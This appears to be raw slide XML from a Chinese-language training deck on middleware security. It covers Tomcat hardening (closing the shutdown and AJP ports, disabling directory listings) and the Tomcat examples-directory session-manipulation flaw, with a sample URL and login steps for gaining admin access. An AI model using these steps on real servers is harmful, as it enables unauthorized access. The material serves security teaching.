            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1277620" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1277112" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127711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7991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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>如何关闭不必要的接口和功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277111" y="2025395"/>
            <a:ext cx="7157084" cy="1201420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="1201420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715670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2438" y="2021268"/>
            <a:ext cx="7166609" cy="1210310"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="1210310">
                <a:moveTo>
                  <a:pt x="7161314" y="1209852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1209852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1209624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1208938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1207884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1205090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00327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="1207884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="1208938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="1209624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="1209852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="12103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1210310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1210310">
                <a:moveTo>
                  <a:pt x="7156551" y="1205090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1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1210310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1210310">
                <a:moveTo>
                  <a:pt x="9525" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1210310">
                <a:moveTo>
                  <a:pt x="7156551" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1210310">
                <a:moveTo>
                  <a:pt x="7166076" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156551" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="12050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7111" y="3535679"/>
            <a:ext cx="7157084" cy="1754505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="1754504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704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2438" y="3530193"/>
            <a:ext cx="7166609" cy="1764030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="1764029">
                <a:moveTo>
                  <a:pt x="7161314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68" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228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7161314" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716607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7166076" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="1763852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609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1764029">
                <a:moveTo>
                  <a:pt x="715655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51" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1764029">
                <a:moveTo>
                  <a:pt x="7156551" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156551" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1764029">
                <a:moveTo>
                  <a:pt x="7166076" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7161314" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609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7166609" h="1764029">
                <a:moveTo>
                  <a:pt x="7156551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7156551" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1764029">
                <a:moveTo>
                  <a:pt x="7166076" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156551" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076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597723"/>
            <a:ext cx="7793990" cy="431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打开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conf/server.xml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</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728345">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1380"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>找到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8005</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728345">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;Server port="8005"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shutdown="SHUTDOWN"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728345">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>修改为：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="72834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&lt;Server port=“-1"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shutdown="SHUTDOWN"&gt;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7283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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>找到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8009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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AJP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1.3 Connector</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728345">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;Connector port="8009" protocol="AJP/1.3" redirectPort="8443"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/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728345">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>修改为：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="72834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&lt;!--</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="137287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&lt;Server port=“-1"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shutdown="SHUTDOWN"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="72834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--&gt;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修改完成后，重启服务器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1364" y="3811270"/>
            <a:ext cx="2040889" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2040890" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2040636" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204063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996565" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2996565" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2996184" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299618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642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禁止目录列表，防止文件名泄露</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2996183" y="1970532"/>
            <a:ext cx="7155180" cy="3970020"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7155180" h="3970020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7155180" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7155180" y="3970020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="397002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0710" y="1965528"/>
            <a:ext cx="7166609" cy="3980179"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="3980179">
                <a:moveTo>
                  <a:pt x="7161301" y="3979837"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3979837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="3979608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="3978935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="3977881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="3976547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3975074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970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3975074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="3975074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="3976547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="3977881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="3978935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="3979608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="3979837"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="398017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166609" h="3980179">
                <a:moveTo>
                  <a:pt x="71565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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="3980179">
                <a:moveTo>
                  <a:pt x="7156538" y="3975074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="3975074"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="3980179">
                <a:moveTo>
                  <a:pt x="7166063" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7161301" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="3980179">
                <a:moveTo>
                  <a:pt x="9525" y="3975074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3975074"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="3980179">
                <a:moveTo>
                  <a:pt x="7156538" y="3975074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="3975074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="3975074"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="3980179">
                <a:moveTo>
                  <a:pt x="7166063" y="3975074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="3975074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="3970312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="397507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477886"/>
            <a:ext cx="9057640" cy="43802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打开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conf/web.xml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查找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servlet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配置，并修改为如下配置：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2510155">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="944"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;servlet&gt;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&lt;servlet-name&gt;default&lt;/servlet-name&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2446655" marR="5080" indent="5080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&lt;servlet-  class&gt;org.apache.catalina.servlets.DefaultServlet&lt;/servlet-class&gt;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&lt;init-param&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3208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&lt;param-name&gt;debug&lt;/param-name&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3208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&lt;param-value&gt;0&lt;/param-value&gt;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&lt;/init-param&gt;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&lt;init-param&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3208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&lt;param-name&gt;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listings</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/param-name&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3208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&lt;param-value&gt;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false</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/param-value&gt;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&lt;/init-param&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2954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&lt;load-on-startup&gt;1&lt;/load-on-startup&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="27006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&lt;/servlet&gt;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主流的中间件</a:t>
            </a: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6"/>
            <a:ext cx="10236886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2150" lvl="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zh-Hans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什么是中间件？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Han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92150" lvl="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endParaRPr lang="en-US" altLang="zh-Han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间件是提供系统软件和应用软件之间连接的软件，以便于软件各部件之间的沟通，主要解决异构网络环境下分布式应用软件的互连与互操作问题，提供标准接口、协议、屏蔽实现细节、提供应用系统易移植性。但中间件不仅仅局限于应用服务器或者数据库服务器。围绕中间件也已经发展出了较为完整的软件产品体系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zh-Han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0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans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常见的中间件种类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Han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0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-Han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r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="24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Hans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数据库中间件、面向消息中间件、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans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Hans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中间件、事务处理监控中间件等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769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690" y="460108"/>
            <a:ext cx="8291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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a: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m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a</a:t>
            </a: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t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器通过后台获取权限的方法</a:t>
            </a:r>
            <a:endParaRPr sz="3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850" y="1596452"/>
            <a:ext cx="22557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后台管理界面：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4919" y="2080260"/>
            <a:ext cx="9663684" cy="2697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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>样例目录</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>操纵漏洞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0" y="1597723"/>
            <a:ext cx="9799549" cy="8406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问题：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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默认安装包含</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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800" spc="80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/examples”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目录，里面存在很多样例，其中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Session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样例允许用户对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Session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进行操纵，因为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Session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是全局通的，所以用户可以通过操纵</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="106680" algn="ctr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Session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获取管理员权限。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URL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10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http://192.168.117.136:8080/examples/servlets/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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3690" y="2895600"/>
            <a:ext cx="8761476" cy="2750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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>样例目录</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>操纵漏洞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597722"/>
            <a:ext cx="28653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输 入 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login</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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/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admin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50" y="4405693"/>
            <a:ext cx="49989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重新打开前台页面，发现已经登录成功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7179" y="1394460"/>
            <a:ext cx="4946904" cy="2987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1404" y="3342132"/>
            <a:ext cx="4785359" cy="2613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9195" y="3811270"/>
            <a:ext cx="2623185" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2623184" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2622804" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262280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2413000" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2413000" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2412492" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24124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60108"/>
            <a:ext cx="6463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>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
